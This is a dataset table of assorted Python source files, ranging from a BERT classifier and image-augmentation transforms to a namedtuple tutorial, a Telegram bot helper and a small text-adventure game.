id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
138050 | <filename>double_check/application.py
from aiohttp.web import Application
from double_check.backends.ramos import configure_ramos
from double_check.handlers import about_hanlder
from double_check.request_token.routes import ROUTES as token_routes
def create_app():
configure_ramos()
app = Application()
app.router.add_routes(token_routes)
app.router.add_get(r'/about', about_hanlder, name='about')
return app
| StarcoderdataPython |
1689449 | from sklearn.model_selection import train_test_split
import pandas as pd
import re
import os
import numpy as np
import tensorflow as tf
import tensorflow_hub as hub
from tensorflow.keras import layers
from tensorflow.keras.preprocessing.sequence import pad_sequences
import bert
def bert_encode(texts, tokenizer, max_len=510):
all_tokens = []
all_masks = []
all_segments = []
for text in texts:
text = tokenizer.tokenize(text)
input_sequence = ["[CLS]"] + text + ["[SEP]"] # BERT can only take 512 tokens. Including these two, we get
# 510+2
pad_len = max_len - len(input_sequence)
tokens = tokenizer.convert_tokens_to_ids(input_sequence) + [0] * pad_len
pad_masks = [1] * len(input_sequence) + [0] * pad_len
segment_ids = [0] * max_len
all_tokens.append(tokens)
all_masks.append(pad_masks)
all_segments.append(segment_ids)
return np.array(all_tokens), np.array(all_masks), np.array(all_segments)
def build_model(bert_layer, output_classes, max_len=512):
input_word_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_word_ids")
input_mask = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="input_mask")
segment_ids = tf.keras.Input(shape=(max_len,), dtype=tf.int32, name="segment_ids")
pooled_output, sequence_output = bert_layer([input_word_ids, input_mask, segment_ids])
clf_output = sequence_output[:, 0, :]
net = tf.keras.layers.Dense(64, activation='relu')(clf_output)
net = tf.keras.layers.Dropout(0.2)(net)
net = tf.keras.layers.Dense(32, activation='relu')(net)
net = tf.keras.layers.Dropout(0.2)(net)
out = tf.keras.layers.Dense(output_classes, activation='softmax')(net)
if output_classes == 2:
loss = 'binary_crossentropy'
else:
loss = 'categorical_crossentropy'
model = tf.keras.models.Model(inputs=[input_word_ids, input_mask, segment_ids], outputs=out)
model.compile(tf.keras.optimizers.Adam(lr=1e-5), loss=loss, metrics=['accuracy'])
return model
def preprocess_txt(text):
sentence = text
# Remove punctuations and numbers
sentence = re.sub('[^a-zA-Z]', ' ', sentence)
# Single character removal
sentence = re.sub(r"\s+[a-zA-Z]\s+", ' ', sentence)
# Removing multiple spaces
sentence = re.sub(r'\s+', ' ', sentence)
return sentence
# import data here as pandas df from csv
def load_data(f_path, preprocess=True):
"""
Loads and preprocesses data from a CSV file into a pandas dataframe. Returns split test and train
data as well as labels.
f_path: file path to .csv file
preprocess: Whether to preprocess data to remove special characters, spaces, punctuation, and numbers.
"""
data = pd.read_csv(f_path)
data = data.drop(["Check"], axis=1).reset_index(drop=True)
if data.isnull().values.any(): # warns us if there are null values
print("W: Null values in data!")
sentences = np.array(data['Sentence'])
if preprocess:
for i, sentence in enumerate(sentences):
sentences[i] = preprocess_txt(sentence)
data['Label'] = data['Label'].replace(['left', 'right'], [0, 1])
train_x, test_x, train_y, test_y = train_test_split(sentences, np.array(data['Label']), test_size=0.1, shuffle=True)
return train_x, test_x, train_y, test_y
def padded_batch_dataset(sentences, labels, batch_size):
sentences = tf.data.Dataset.from_generator(lambda: (sentences, labels), output_types=(tf.int32, tf.int32))
batched_dataset = sentences.padded_batch(batch_size, padded_shapes=((None,), ()))
return batched_dataset
BertTokenizer = bert.bert_tokenization.FullTokenizer
bert_layer = hub.KerasLayer("https://tfhub.dev/tensorflow/bert_en_uncased_L-12_H-768_A-12/3", trainable=False)
vocabulary_file = bert_layer.resolved_object.vocab_file.asset_path.numpy()
to_lower = bert_layer.resolved_object.do_lower_case.numpy()
tokenizer = BertTokenizer(vocabulary_file, to_lower)
# fname = os.path.join(os.getcwd(), "\\commands_dataset.csv")
fname = "F:\\Documents\\Python Scripts\\RobotVoiceCommand\\commands_dataset.csv"
train_seq, test_seq, train_lab, test_lab = load_data(fname)
# make custom model
# define hyperparameters
PAD_LENGTH = len(sorted(train_seq, key=len)[-1])
OUTPUT_CLASSES = 2
NB_EPOCHS = 30
BATCH_SIZE = 8
train_input = bert_encode(train_seq, tokenizer=tokenizer, max_len=PAD_LENGTH)
test_input = bert_encode(test_seq, tokenizer=tokenizer, max_len=PAD_LENGTH)
model = build_model(bert_layer=bert_layer, output_classes=OUTPUT_CLASSES, max_len=PAD_LENGTH)
model.summary()
history = model.fit(train_input,
train_lab,
batch_size=BATCH_SIZE,
epochs=NB_EPOCHS,
validation_split=0.2)
| StarcoderdataPython |
1655303 | <gh_stars>1-10
"""Tools for infix-based language games
Basic rules:
- <infix> is inserted after each group of consonants that is followed by a vowel
- if a word starts with a vowel, <infix> is inserted before this vowel
Extended rules:
- 'qu' is kept for syntactic purposes
"query" => "quaveravy"
- for 3+ character words, the final '-e/-es' is not infixed
"abide" => "avabavide"
- 'y' behaves as a consonant when it is followed by a vowel
"coyote" => "cavoyavote"
"""
import re
from .utils import is_consonant_or_y, is_vowel
def infix_word(word, infix):
"""Infix a single word with a given syllable"""
# pylint: disable=bad-continuation
previous = ""
new_word = ""
for index, char in enumerate(word):
if (previous.lower(), char.lower()) == ("q", "u"):
new_word += char + infix
elif (
len(word) > 2
and word[index:].lower() in ("e", "es")
and is_consonant_or_y(previous)
):
new_word += char
elif char.lower() == "y" and index == 0:
new_word += char
elif is_vowel(char) and (index == 0 or is_consonant_or_y(previous)):
if char.isupper():
new_word += infix.capitalize() + char.lower()
else:
new_word += infix + char
else:
new_word += char
previous = char
return new_word
def infix_text(text, infix):
"""Infix text with a given syllable"""
if not text:
return ""
new_text = []
for token in text.split():
new_token = ""
for subtoken in re.findall(r"\w+|[^\w\s]", token):
new_token += infix_word(subtoken, infix)
new_text.append(new_token)
return " ".join(new_text)
| StarcoderdataPython |
3247124 | <gh_stars>10-100
from context import aiolearn
import getpass
user = aiolearn.User(username='keh13',
password=getpass.getpass("input password:"))
semester = aiolearn.Semester(user)
print(user)
| StarcoderdataPython |
137656 | from neurosky._connector import Connector
from neurosky._processor import Processor
from neurosky._trainer import Trainer
from neurosky.utils import KeyHandler
__all__ = ['Connector', 'Processor', 'Trainer', 'KeyHandler']
| StarcoderdataPython |
4816905 | # LICENSE
#
# _This file is Copyright 2018 by the Image Processing and Analysis Group (BioImage Suite Team). Dept. of Radiology & Biomedical Imaging, Yale School of Medicine._
#
# BioImage Suite Web is licensed under the Apache License, Version 2.0 (the "License");
#
# - you may not use this software except in compliance with the License.
# - You may obtain a copy of the License at [http://www.apache.org/licenses/LICENSE-2.0](http://www.apache.org/licenses/LICENSE-2.0)
#
# __Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.__
#
# ENDLICENSE
import os
import sys
def getOptimizationCode(name="ConjugateGradient"):
name=name.lower();
if (name == "hillclimb"):
return 0;
if (name == "gradientdescent"):
return 1;
return 2;
def getMetricCode(name="NMI"):
name = name.upper();
if (name == "SSD"):
return 0;
if (name == "CC"):
return 1;
if (name == "MI"):
return 2;
return 3;
def getLinearModeCode(name="Rigid"):
name = name.lower();
if (name == "similarity"):
return 1;
if (name == "affine9"):
return 2;
if (name == "affine"):
return 3;
if (name == "none"):
return -1;
return 0;
def resliceRegistrationOutput(libbis, reference, target, transform):
spa = reference.spacing;
dim = reference.dimensions;
return libbis.resliceImageWASM(
target, transform, {
"spacing": [spa[0], spa[1], spa[2]],
"dimensions": [dim[0], dim[1], dim[2]],
"interpolation": 1
},0);
def getModuleDescriptionFromFile(classname):
try:
import biswebpython.lib.bismodules_desc as bismodules_desc;
except ImportError:
my_path=os.path.dirname(os.path.realpath(__file__));
n=my_path+'/../../build/native';
l=sys.path;
if (n not in l):
sys.path.append(n);
n=my_path+'/../build/native';
l=sys.path;
if (n not in l):
sys.path.append(n);
import bismodules_desc;
return bismodules_desc.descriptions[classname];
def getDynamicLibraryWrapper():
try:
import biswebpython.lib.biswrapper as libbis;
except ImportError:
my_path=os.path.dirname(os.path.realpath(__file__));
n=my_path+'/../../build/native';
l=sys.path;
if (n not in l):
sys.path.append(n);
import biswrapper as libbis;
return libbis;
def downloadIfNeeded(fname,basedir,tempdir):
inputname=basedir+fname;
sname=inputname;
import wget;
if (inputname.startswith('http')):
f=fname.replace('://','__');
f=f.replace('/','_');
sname=os.path.abspath(tempdir+'/'+f);
print('.... Downloading ',inputname,': ');
wget.download(inputname,sname);
print('\n');
elif (len(basedir)>0):
print('.... remapping ',fname,'to',sname);
return sname;
def getDebugParam():
return {
"name": "Debug",
"description": "Toggles debug logging",
"priority": 1000,
"advanced": True,
"gui": "check",
"varname": "debug",
"type": 'boolean',
"default": False,
};
def getRegressorInput():
return {
'type': 'matrix',
'name': ' Regressor',
'description': 'The regressor matrix',
'varname': 'regressor',
'shortname': 'r',
};
def getImageToImageInputs(desc='The image to be processed'):
return [
{
'type': 'image',
'name': 'Input Image',
'description': desc,
'varname': 'input',
'shortname': 'i',
'required': True,
}];
def getImageToImageOutputs(desc = 'Save the output image'):
return [{
'type': 'image',
'name': 'Output Image',
'description': desc,
'varname': 'output',
'shortname': 'o',
'required': True,
'extension': '.nii.gz',
}];
def getMatrixToMatrixInputs(addweights = False, desc = 'The input data (matrix) to process. Rows=Frames, Columns=Series.'):
arr = [
{
'type': 'matrix',
'name': 'Matrix',
'description': desc,
'varname': 'input',
'shortname': 'i',
'required': True,
}
];
if (addweights):
arr.append({
'type': 'vector',
'name': 'Weights',
'description': '(Optional). The framewise weight vector',
'varname': 'weight',
'shortname': 'w',
'required': False,
});
return arr;
def getMatrixToMatrixOutputs(desc = 'The output matrix',extension='.matr'):
return [
{
'type': 'matrix',
'name': 'Output Matrix',
'description': desc,
'varname': 'output',
'shortname': 'o',
'required': True,
'extension' : extension
}
];
| StarcoderdataPython |
3205785 | import numpy as np
import matplotlib.pyplot as plt
import math
from matplotlib import cm
from mpl_toolkits.mplot3d.axes3d import Axes3D
def get_cost_function(h_theta_x, logistic=False):
def cost_func(thetas, training_set):
result = 0
for training_sample in training_set:
nonlocal logistic
if logistic:
hx = h_theta_x(thetas, training_sample[:-1])
y = training_sample[-1]
result += -y * math.log(hx) - (1 - y) * math.log(1 - hx)
else:
result += pow(h_theta_x(thetas, training_sample[:-1]) - training_sample[-1], 2)
result *= (1/(2 * len(training_set)))
return result
return cost_func
def hypothesis_linear_regression(thetas, training_sample):
return thetas[0] + sum(training_sample * thetas[1:])
def hypothesis_logistic_regression(thetas, training_sample):
z = thetas[0] + sum(training_sample * thetas[1:])
return 1 / (1 + np.e ** (-z))
my_training_set = np.array([0, 1,
1, 0,
2, 1,
3, 0]).reshape(4, 2)
my_cost_func_linear_regression = get_cost_function(hypothesis_linear_regression)
my_cost_func_logistic_regression_non_convex = get_cost_function(hypothesis_logistic_regression)
my_cost_func_logistic_regression_convex = get_cost_function(hypothesis_logistic_regression, logistic=True)
my_thetas_lst = []
cost_lst_linear_regression = []
cost_lst_logistic_regression_non_convex = []
cost_lst_logistic_regression_convex = []
start = -10
stop = 10
step = 1
for theta_0 in np.arange(start, stop, step):
for theta_1 in np.arange(start, stop, step):
my_thetas_lst.append(np.array([theta_0, theta_1]))
for my_thetas in my_thetas_lst:
cost_linear = my_cost_func_linear_regression(my_thetas, my_training_set)
cost_logistic_non_convex = my_cost_func_logistic_regression_non_convex(my_thetas, my_training_set)
cost_logistic_convex = my_cost_func_logistic_regression_convex(my_thetas, my_training_set)
cost_lst_linear_regression.append(cost_linear)
cost_lst_logistic_regression_non_convex.append(cost_logistic_non_convex)
cost_lst_logistic_regression_convex.append(cost_logistic_convex)
theta_0_lst = [x[0] for x in my_thetas_lst]
theta_1_lst = [x[-1] for x in my_thetas_lst]
plt.close('all')
fig = plt.figure(figsize=(35, 23), dpi=1000)
fig.patch.set_facecolor('white')
ax = fig.add_subplot(221, projection='3d')
ax.set_title('Linear Regression Cost Function (convex)')
ax.plot_trisurf(theta_0_lst, theta_1_lst, cost_lst_linear_regression, cmap=cm.jet, linewidth=0.1)
plt.xlabel('theta 0')
plt.ylabel('theta 1')
ax = fig.add_subplot(222, projection='3d')
ax.set_title('Logistic Regression Cost Function (non-convex)')
ax.plot_trisurf(theta_0_lst, theta_1_lst, cost_lst_logistic_regression_non_convex, cmap=cm.jet, linewidth=0.1)
plt.xlabel('theta 0')
plt.ylabel('theta 1')
ax = fig.add_subplot(223, projection='3d')
ax.set_title('Logistic Regression Cost Function (non-convex)')
ax.plot_trisurf(theta_0_lst, theta_1_lst, cost_lst_logistic_regression_convex, cmap=cm.jet, linewidth=0.1)
plt.xlabel('theta 0')
plt.ylabel('theta 1')
plt.show() | StarcoderdataPython |
196813 | _base_ = ['./mswin_par_small_patch4_512x512_160k_ade20k_pretrain_224x224_1K.py']
model = dict(
decode_head=dict(
mode='seq',
))
data = dict(samples_per_gpu=10)
| StarcoderdataPython |
5541 | import tensorflow as tf
FLIPPING_TENSOR = tf.constant([1.0, -1.0, 1.0])
@tf.function
def sample_data(points, labels, num_point):
if tf.random.uniform(shape=()) >= 0.5:
return points * FLIPPING_TENSOR, labels
return points, labels
mock_data = tf.constant([
[1., 2., 3.],
[4., 5., 6.],
[7., 8., 9.]
])
mock_labels = tf.constant([
[1.], [0.], [1.]
])
sampling_lambda = lambda x, y: sample_data(x, y, 512)
train_data = tf.data.Dataset.from_tensors((mock_data, mock_labels)) \
.map(sampling_lambda) \
.unbatch() \
.batch(1) \
.repeat(5)
for x, y in train_data:
print(x) | StarcoderdataPython |
3200783 | <reponame>HembramBeta777/Python-Programming
# Find multiplication table of number n
num = int(input("Enter a number: "))
for i in range(1,11):
mul = num * i
print(num," * ",i," = ",mul)
| StarcoderdataPython |
3397400 | <filename>build/zip.py
import zipfile
from io import BytesIO
class InMemoryZip(object):
def __init__(self):
# Create the in-memory file-like object for working w/imz
self.in_memory_zip = BytesIO()
self.files = []
def append(self, filename_in_zip, file_contents):
# Appends a file with name filename_in_zip and contents of
# file_contents to the in-memory zip.
# Get a handle to the in-memory zip in append mode
zf = zipfile.ZipFile(self.in_memory_zip, "a", zipfile.ZIP_DEFLATED, False)
# Write the file to the in-memory zip
zf.writestr(filename_in_zip, file_contents)
# Mark the files as having been created on Windows so that
# Unix permissions are not inferred as 0000
for zfile in zf.filelist:
zfile.create_system = 0
return self
def readFromMemory(self):
# Returns a string with the contents of the in-memory zip.
self.in_memory_zip.seek(0)
return self.in_memory_zip.read()
def readFromDisk(self, url):
zf = zipfile.ZipFile(url, 'r')
for file in zf.infolist():
self.files.append(zf.read(file.filename))
def writetofile(self, filename):
# Writes the in-memory zip to a file.
f = open(filename, "wb")
f.write(self.readFromMemory())
f.close()
# * * * * * * * * * * * * * * * * * * * * * * * * * *
| StarcoderdataPython |
3228111 | ## NOTE: Requires Python 3.7 or higher
from collections import namedtuple
emp1 = ('Pankaj', 35, 'Editor')
emp2 = ('David', 40, 'Author')
for p in [emp1, emp2]:
print(p)
for p in [emp1, emp2]:
print(p[0], 'is a', p[1], 'years old working as', p[2])
# pythonic way
for p in [emp1, emp2]:
print('%s is a %d years old working as %s' % p)
# converting to namedtuple
# Employee = namedtuple('Employee', 'name age role')
# Employee = namedtuple('Employee', 'name,age,role')
Employee = namedtuple('Employee', ['name', 'age', 'role'])
emp1 = Employee('Pankaj', 35, 'Editor')
emp2 = Employee(name='David', age=40, role='Author')
for p in [emp1, emp2]:
print(p)
# accessing via index value
for p in [emp1, emp2]:
print('%s is a %d years old working as %s' % p)
# accessing via name of the field
for p in [emp1, emp2]:
print(p.name, 'is a', p.age, 'years old working as', p.role)
# namedtuple invalid keys and rename parameter
try:
Person = namedtuple('Person', 'def class')
except ValueError as error:
print(error)
# rename=True will rename invalid names to index value with underscore prefix
Person = namedtuple('Person', 'name def class', rename=True)
print(Person._fields)
# namedtuple module parameter - introduced in 3.6
Person = namedtuple('Person', 'name', module='MyPersonModule')
print(Person.__module__)
# namedtuple additional methods
# _make(iterable)
t = ('Lisa', 35, 'Contributor')
emp3 = Employee._make(t)
print(emp3)
# _asdict()
od = emp3._asdict()
print(od)
# _replace(**kwargs)
emp3 = emp3._replace(name='<NAME>', age=40)
print(emp3)
# namedtuple additional attributes
# _fields
print(emp3._fields)
Gender = namedtuple('Gender', 'gender')
Person = namedtuple('Person', Employee._fields + Gender._fields)
print(Person._fields)
# _fields_defaults - introduced in Python 3.7
# Python 3.7 removed verbose parameter and _source attribute
Person1 = namedtuple('Person1', ['name', 'age'], defaults=['Pankaj', 20])
print(Person1._fields_defaults)
# Miscellaneous examples
# getattr
emp3_name = getattr(emp3, 'name')
print(emp3_name)
# Dict to Named Tuple
d = {'age': 10, 'name': 'pankaj', 'role':'CEO'}
emp4 = Employee(**d)
print(d)
print(emp4) | StarcoderdataPython |
110525 | <reponame>LeRoi46/opennero
import json
import constants
import OpenNero
import agent as agents
def factory(ai, *args):
cls = ai_map.get(ai, NeroTeam)
return cls(*args)
class TeamEncoder(json.JSONEncoder):
def default(self, obj):
if isinstance(obj, NeroTeam):
return {
'team_ai': inv_ai_map.get(obj.__class__, 'none'),
'agents': [
{
'agent_ai': agent.ai_label(),
'args': agent.args()
}
for agent in obj.agents
]
}
return json.JSONEncoder.default(self, obj)
def as_team(team_type, dct):
if 'team_ai' in dct:
team = factory(dct['team_ai'], team_type)
for a in dct['agents'][:constants.pop_size]:
team.create_agent(a['agent_ai'], *a['args'])
return team
return dct
class NeroTeam(object):
"""
Basic NERO Team
"""
def __init__(self, team_type):
self.team_type = team_type
self.color = constants.TEAM_LABELS[team_type]
self.agents = set()
self.dead_agents = set()
def create_agents(self, ai):
for _ in range(constants.pop_size):
self.create_agent(ai)
def create_agent(self, ai, *args):
a = agents.factory(ai, self.team_type, *args)
self.add_agent(a)
return a
def add_agent(self, a):
self.agents.add(a)
def kill_agent(self, a):
self.agents.remove(a)
self.dead_agents.add(a)
def is_episode_over(self, agent):
return False
def reset(self, agent):
pass
def start_training(self):
pass
def stop_training(self):
pass
def is_destroyed(self):
return len(self.agents) == 0 and len(self.dead_agents) > 0
def reset_all(self):
self.agents |= self.dead_agents
self.dead_agents = set()
class RTNEATTeam(NeroTeam):
def __init__(self, team_type):
NeroTeam.__init__(self, team_type)
self.pop = OpenNero.Population()
self.rtneat = OpenNero.RTNEAT("data/ai/neat-params.dat",
self.pop,
constants.DEFAULT_LIFETIME_MIN,
constants.DEFAULT_EVOLVE_RATE)
self.generation = 1
def add_agent(self, a):
NeroTeam.add_agent(self, a)
self.pop.add_organism(a.org)
def start_training(self):
OpenNero.set_ai('rtneat-%s' % self.team_type, self.rtneat)
def stop_training(self):
OpenNero.set_ai('rtneat-%s' % self.team_type, None)
def is_episode_over(self, agent):
return agent.org.eliminate
def reset(self, agent):
if agent.org.elminate:
agent.org = self.rtneat.reproduce_one()
def reset_all(self):
NeroTeam.reset_all(self)
#TODO: Epoch can segfault without fitness differentials
if any([agent.org.fitness > 0 for agent in self.agents]):
self.generation += 1
self.pop.epoch(self.generation)
for agent, org in zip(self.agents, self.pop.organisms):
agent.org = org
ai_map = {
'rtneat': RTNEATTeam,
'none': NeroTeam
}
inv_ai_map = {v: k for k, v in ai_map.items()}
| StarcoderdataPython |
180844 | import msg
def readToken():
with open('token.txt', 'r') as f:
return f.readline().strip("\n")
def hasNick(update):
if update.message.from_user.username != None:
return True
return False
def getLinks(filename):
links = ""
count = 1
fn = 'Resources/' + filename
if filename != 'Books': # El fichero Books es el unico que tiene un formato diferente
with open(fn, 'r') as f:
l = f.readline().strip("\n")
while l:
links += str(count) + ". " + l + "\n\n"
count += 1
l = f.readline().strip("\n")
else:
with open(fn, 'r') as f:
n = f.readline().strip("\n")
l = f.readline().strip("\n")
while n and l:
links+= str(count) + ". " + n + "\n" + l + "\n\n"
count += 1
n = f.readline().strip("\n")
l = f.readline().strip("\n")
return links
def readAdmins():
admins = []
with open('admins.txt', 'r') as f:
Id = f.readline().strip('\n')
while Id:
admins.append(Id)
Id = f.readline().strip('\n')
return admins
def isAdmin(user_id):
admins = readAdmins()
if str(user_id) in admins:
return True
return False
def parseLink(bot, text, option):
if option == "down":
rep = msg.reportDown(text)
if rep != None:
for i in readAdmins():
bot.send_message(chat_id=i, text=rep)
else:
print("\t-- Bad input: " + "[" + text + "]")
elif option == "new":
new = msg.newLink(text)
if new != None:
for i in readAdmins():
bot.send_message(chat_id=i, text=new)
else:
print("\t-- Bad input: " + "["+ text + "]")
def addLink(link, category):
try:
fn = 'Resources/' + category
with open(fn, 'a') as f:
f.write(link + '\n')
except:
print(msg.wrongData)
def removeLink(link, category):
try:
fn = 'Resources/' + category
old = []
with open(fn, 'r') as f:
old = f.readlines()
new = [i for i in old if i.strip('\n') != link]
with open(fn, 'w') as f:
for i in new:
f.write(i)
except:
print(msg.wrongData)
| StarcoderdataPython |
106297 | #!/usr/bin/python
import csv
import sys
with open("input.txt") as tsv:
checksum = 0
for line in csv.reader(tsv, dialect="excel-tab"): #You can also use delimiter="\t" rather than giving a dialect.
lineLargest = 0
lineSmallest = sys.maxint
for valueString in line:
value = int(valueString)
if value < lineSmallest:
lineSmallest = value
if value > lineLargest:
lineLargest = value
difference = lineLargest - lineSmallest
checksum += difference
print("largest", lineLargest, "smallest", lineSmallest, "difference", difference, "checksum", checksum)
print("checksum", checksum)
| StarcoderdataPython |
4803282 | <reponame>worms-maker/Python-123
# Declaration of Variable in Python
# Python Work with Indentation so, When Write code Then Most important is Formatting of Code.
# Python Variable name Only Start With (_)UnderScore or Alphabets.
# Other Keyboard Symbols are Not accept in NamingConvention.
# Use Different Type of Case
# (1). PascalCase : NameOfSchool
# (2). camelCase : getDataOfTable
# (3). Snake Case : name_of_laptop
from wsgiref import validate
A = 10
B = 15
B_A = 20
_A = 30
B_ = 40
print(A, B, B_A, _A, B_) # 10 15 20 30 40
# Internally Work of Python for Assigning Variable
# id() return the
X = 10
Y = X
print("X :", id(X))
print("Y :", id(Y))
# both Variable Id same
X = 12
print("X :", id(X)) # X id is Different SO, Create New Object When Declare Again
# Assign One Value to Multiple Variable
E = F = G = 100
print(E, F, G)
# Assign Multiple Value to Multiple Variable
H, I, J = 12, 23, 34
print(H, I, J)
# type() method Return's Type of Object
name = "First Learn then Remove 'L'"
print("NameType :", type(name))
float_A = 1.1
print("float_A_Type :", type(float_A))
# Amazing Facts About Python Variable
# - In Python No any Keyword Use like : Integer , String , boolean etc.
# - Just Write Variable name and assign it's Value
| StarcoderdataPython |
23854 | """
:filename transformations.py
:author <NAME>
:email <EMAIL>
from
Classes of custom transformations that are applied during the training as additional augmentation of the depth maps.
"""
import torch
import random
import numpy as np
import torch.nn.functional as F
from random import randrange
from skimage.transform import resize, warp, AffineTransform
class Normalize(object):
"""Normalization of a depth map in the value of [0, 1] for each pixel."""
def __init__(self, input_type):
self.input_type = input_type
def __call__(self, sample):
if self.input_type == 'geom':
image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
mean, std = image.mean([1, 2]), image.std([1, 2])
# TODO?
return {'image': image,
'landmarks': landmarks,
'label': label}
class ToTensor(object):
"""Transformation of a training sample into a torch tensor instance."""
def __init__(self, input_type):
self.input_type = input_type
def __call__(self, sample):
image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
image = torch.from_numpy(image.copy())
if self.input_type != 'depth+geom':
image = image.unsqueeze(1)
image = image.permute(1, 0, 2)
else:
image = image.permute(2, 0, 1)
landmarks = np.asarray(landmarks)
landmarks = torch.from_numpy(landmarks.copy())
return {'image': image,
'landmarks': landmarks,
'label': label}
class Resize(object):
"""Resizing of the input sample into provided dimensions."""
def __init__(self, width, height, input_type='image'):
assert isinstance(width, int)
assert isinstance(height, int)
self.width = width
self.height = height
self.type = input_type
def __call__(self, sample):
image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
resized_landmarks = landmarks.copy()
if self.type == 'image':
image = resize(image, (self.height, self.width), anti_aliasing=True)
if self.type == 'landmarks':
resized_landmarks = []
for landmark in landmarks:
landmark_resized = resize(landmark, (self.height, self.width), anti_aliasing=True)
resized_landmarks.append(landmark_resized)
return {'image': image,
'landmarks': resized_landmarks,
'label': label}
class RandomTranslating(object):
"""Randomly translate the input sample from range [-10 px, 10 px] with provided probability."""
def __init__(self, p=0.5):
assert isinstance(p, float)
self.p = p
def __call__(self, sample):
image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
translated_landmarks = landmarks.copy()
if np.random.rand(1) < self.p:
n1 = randrange(-10, 10)
n2 = randrange(-10, 10)
t = AffineTransform(translation=(n1, n2))
image = warp(image, t.inverse)
translated_landmarks = []
for landmark in landmarks:
translated_landmarks.append(warp(landmark, t.inverse))
return {'image': image,
'landmarks': translated_landmarks,
'label': label}
class RandomScaling(object):
"""Randomly scales the input sample with scale index from range [0.90, 1.10] with provided probability."""
def __init__(self, p=0.5):
assert isinstance(p, float)
self.p = p
def __call__(self, sample):
image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
scaled_landmarks = landmarks.copy()
if np.random.rand(1) < self.p:
n = random.uniform(0.90, 1.10)
t = AffineTransform(scale=(n, n))
image = warp(image, t.inverse)
scaled_landmarks = []
for landmark in landmarks:
scaled_landmarks.append(warp(landmark, t.inverse))
return {'image': image,
'landmarks': scaled_landmarks,
'label': label}
class RandomRotation(object):
"""Randomly rotates the input sample from range [−11.25 deg, 11.25 deg] with provided probability."""
def __init__(self, p=0.5):
assert isinstance(p, float)
self.p = p
def __call__(self, sample):
image, landmarks, label = sample['image'], sample['landmarks'], sample['label']
rnd_num1 = randrange(-32, -6)
rnd_num2 = randrange(6, 32)
rnd_num = random.choice([rnd_num1, rnd_num2])
if np.random.rand(1) < self.p:
rotated_image = self.rotate(x=image.unsqueeze(0).type(torch.FloatTensor), theta=np.pi/rnd_num)
rotated_landmarks = []
for _, landmark in enumerate(landmarks):
rotated_landmark = self.rotate(x=landmark.unsqueeze(0).unsqueeze(0).type(torch.FloatTensor), theta=np.pi/rnd_num)
rotated_landmarks.append(rotated_landmark.squeeze(0))
result = torch.cat(rotated_landmarks, dim=0)
return {'image': rotated_image.squeeze(0),
'landmarks': result,
'label': label}
return {'image': image,
'landmarks': landmarks,
'label': label}
@staticmethod
def get_rotation_matrix(theta):
"""Returns a tensor rotation matrix with given theta value."""
theta = torch.tensor(theta)
return torch.tensor([[torch.cos(theta), -torch.sin(theta), 0],
[torch.sin(theta), torch.cos(theta), 0]])
def rotate(self, x, theta):
rot_mat = self.get_rotation_matrix(theta)[None, ...].repeat(x.shape[0], 1, 1)
grid = F.affine_grid(rot_mat, x.size(), align_corners=False)
x = F.grid_sample(x, grid, align_corners=False)
return x
| StarcoderdataPython |
4841903 | # Copyright (c) <NAME> <<EMAIL>>
# See LICENSE file.
from _sadm.utils import path, systemd
__all__ = ['deploy']
# run as root at last pass
sumode = 'post'
def deploy(env):
destdir = env.settings.get('network.fail2ban', 'config.destdir')
jdisable = env.settings.getlist('network.fail2ban', 'jail.disable')
for jn in jdisable:
fn = path.join(destdir, 'jail.d', jn + '.conf')
if path.isfile(fn):
env.log("remove %s" % fn)
path.unlink(fn)
env.log("restart")
systemd.restart('fail2ban')
| StarcoderdataPython |
4804568 | <filename>Development Resources/Miscellaneous Content/level1.py
health = 100
inventory = []
def level_1(health, inventory):
print("You step into a huge room. The door swings shut behind you.")
exit_room = False
door = 'locked'
sarcophagus = ['medalion', 'key', 'closed']
while not exit_room:
action = input("\n> ")
action = action.lower()
if action == 'inventory':
print(inventory)
elif action == 'health':
print(health)
if action == 'look':
print("\nThe room you are in is very large and bare.\n",
"Directly in front of your there is another door,\n",
"much smaller than the first. To you left, there is\n",
"a long sarcophagus.")
elif action == 'inspect door':
print("\nNext to the door, a skeleton hand protrudes from the wall.\n",
"Above the hand, you see the enscription:\n",
"\t\t'Tribute'")
elif action == 'open door':
if door == 'locked':
print("\nThe door is locked.")
elif door == 'unlocked':
door = 'open'
print("\nThe door swings open easily, revealing a staircase leading up.")
else:
print("Door opened.")
door = 'open'
elif action == 'inspect hand':
print("\nThere is nothing particularly interesting about\n",
"the hand. It looks as if it is waiting for somthing")
elif action == 'inspect sarcophagus':
print("\nThe sarcophasgus is very elaborate. it is plated\n",
"in gold and jewels. On the lid, the words 'A theif's reward'\n",
"appear")
elif action in ('open sarcophagus','lift lid'):
if 'closed' in sarcophagus:
sarcophagus.remove('closed')
if 'medalion' in sarcophagus and 'key' in sarcophagus:
print("\nThe lid creaks open. Inside there is an ancient\n",
"mummy. Arround the mummy's neck there is a\n",
"gold medalion. A small metal key lies next to the mummy")
elif 'medalion' in sarcophagus:
print("\nThe lid creaks open. Inside there is an ancient\n",
"mummy. Arround the mummy's neck there is a\n",
"gold medalion.")
elif 'key' in sarcophagus:
print("\nThe lid creaks open. Inside there is an ancient\n",
"mummy. A small metal key lies next to the mummy")
else:
print("\nThe lid creaks open. Inside there is an ancient\n",
"mummy.")
elif action == 'take medalion':
if 'medalion' in sarcophagus and 'closed' not in sarcophagus:
sarcophagus.remove('medalion')
inventory.append('medalion')
print("\nYou have added the medalion to your inventory.")
elif 'medalion' in inventory:
print("\nYou already have this item.")
elif action == 'take key':
if 'key' in sarcophagus and 'closed' not in sarcophagus:
sarcophagus.remove('key')
inventory.append('key')
print("\nYou have added the key to your inventory.")
elif 'medalion' in inventory:
print("You already have this item.")
elif action in ('give medalion', 'place medalion'):
if 'medalion' in inventory:
door = 'unlocked'
print("\nYou cautiously drop the medalion into the skeleton's hand.\n",
"The bony fingers crack as they close arround the gold. You\n",
"hear a light click behind the door")
elif action in ('give key', 'place key'):
if 'key' in inventory:
print("\nNothing happens. You slide the key back into your pocket")
